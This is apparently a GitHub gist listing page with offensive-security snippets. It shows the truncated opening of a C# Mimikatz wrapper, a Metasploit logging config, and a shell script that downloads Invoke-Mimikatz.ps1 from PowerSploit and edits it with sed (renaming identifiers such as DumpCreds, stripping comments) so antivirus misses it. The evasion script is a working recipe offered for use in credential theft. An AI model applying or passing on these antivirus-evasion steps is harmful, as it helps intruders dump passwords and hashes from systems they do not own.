Skip to content

Instantly share code, notes, and snippets.

@thesubtlety
thesubtlety / katz.cs
Created Aug 1, 2018
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
View katz.cs
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@thesubtlety
thesubtlety / invoke_evasion.sh
Created May 16, 2018 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
View invoke_evasion.sh
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
View loggingprompt.md

In your ~/.msf directory, create a file msfconsole.rc

set ConsoleLoggin true
set LogLevel 5
set SessionLoggin true
set TimeStampOutput true
set PROMPT %T %L

For bash